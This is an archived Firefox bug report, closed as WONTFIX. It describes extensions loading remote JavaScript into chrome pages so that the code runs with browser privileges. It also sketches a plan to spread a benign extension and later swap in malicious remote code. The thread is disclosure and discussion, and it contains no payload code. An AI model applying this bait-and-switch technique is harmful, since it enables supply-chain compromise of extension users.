chrome javascript priviledge vulnerability with extensions

RESOLVED WONTFIX

Status

()

--
critical
RESOLVED WONTFIX
13 years ago
13 years ago

People

(Reporter: jason_nospam, Unassigned)

Tracking

Firefox Tracking Flags

(Not tracked)

Details

Attachments

(1 attachment)

(Reporter)

Description

13 years ago
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b5) Gecko/20051006 Firefox/1.4.1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b5) Gecko/20051006 Firefox/1.4.1

Extensions are able to inlude a html file within the chrome directory. this html file and it's javascript have higher priviledges than pages loaded from the internet. It is possible to include an almost blank html file in an extension which references a javascript file from the internet. This javascript file can then use document.write statements to write html to the file within the chrome directory. This html document created from the external javascript statements will then have normal chrome priviledges even though the page was effectly loaded from a remote internet location. 

With this vulnerability it would be possible for a regular useful extension to propagate through the community unnoticed and then once widespread adoption has been achieved, change the remote javascript to include some malicious code that will have chrome priviledges.

Reproducible: Always

Steps to Reproduce:
1. Install the priviledge test extension that is attached
2. navigate to chrome://privtest/content/test.html
3. this chrome html page will load a js file from yellowgorilla.net and in this js is a javascript statement to show the firefox preferences page. something that chrome priviledges are needed to do.
4. Click the "Options" link to show the options page

Actual Results:  
the options page is displayed

Expected Results:  
as the html pages was effectively loaded from the internet, the javascript should not be allowed to execute.
(Reporter)

Comment 1

13 years ago
Created attachment 201483 [details]
An extension that demonstrates the vulnerability

Comment 2

13 years ago
Extensions have same privileges as Firefox.  You have to trust the authors of extensions you use, or audit each version.
Group: security
Status: UNCONFIRMED → RESOLVED
Last Resolved: 13 years ago
Resolution: --- → WONTFIX
(Reporter)

Comment 3

13 years ago
(In reply to comment #2)
> Extensions have same privileges as Firefox.  You have to trust the authors of
> extensions you use, or audit each version.
> 

The point of this bug is that an audit would not pick this up as the code can be changed at a later date after installation and from a remote location. In the attached extension, the code with chrome priviledges originates from my website yellowgorilla.net. I could in effect change this at any time
Status: RESOLVED → UNCONFIRMED
Resolution: WONTFIX → ---
(Reporter)

Comment 4

13 years ago
(In reply to comment #3)
> (In reply to comment #2)
> > Extensions have same privileges as Firefox.  You have to trust the authors of
> > extensions you use, or audit each version.
> > 
> 
> The point of this bug is that an audit would not pick this up as the code can
> be changed at a later date after installation and from a remote location. In
> the attached extension, the code with chrome priviledges originates from my
> website yellowgorilla.net. I could in effect change this at any time
> 


Maybe I didn't explain myself clearly. The bug is not that chrome files have higher priviledges. I understand this. It is the code that has these higher priviledges can be loaded from a remote internet location
The auditing process obviously needs to include detection of extensions that include remote content. This comes down to whether or not you trust the extension, there are plenty of other bad things it could do without having to load remote content.

Comment 6

13 years ago
If an extension has the same privileges as Firefox, it can obviously use those privileges to download remote code and execute it with the same privileges.  As Gavin said, you should notice when an extension is doing that when you audit it.
Status: UNCONFIRMED → RESOLVED
Last Resolved: 13 years ago13 years ago
Resolution: --- → WONTFIX
Extensions have access to the networking and file components -- they can download and overwrite themselves. Extensions can download a string from just about anywhere--even the URL of a redirect would work--and then eval() it. The only thing you can do is say that whole class of actions is unauditable and either suspicious or unsafe.

As addons.mozilla.org has grown beyond our known community we have instituted a policy that the extensions we host not do this kind of thing. Extensions from elsewhere you either need to audit or trust that their source has done so.

Installing an extension is installing software, with all the same risks as downloading some random .exe off the web. Use the same decision process about whether to trust them.
(Reporter)

Comment 8

13 years ago
> Installing an extension is installing software, with all the same risks as
> downloading some random .exe off the web. Use the same decision process about
> whether to trust them.
> 

So should I take it that that means all the publicity that firefox is inherently safer than Internet Explorer because it doesn't implement the ActiveX system are false. There is a public perception that this is the case and this could be dangerous (a false sense of security)

Comment 9

13 years ago
The main problems with ActiveX were that it 

(1) had a confusing warning dialog for installing new software and 
(2) exposed a zillion poorly audited modules to web content by default.

Firefox's extension mechanism does not have the first problem and the second problem isn't relevant.
You need to log in before you can comment on or make changes to this bug.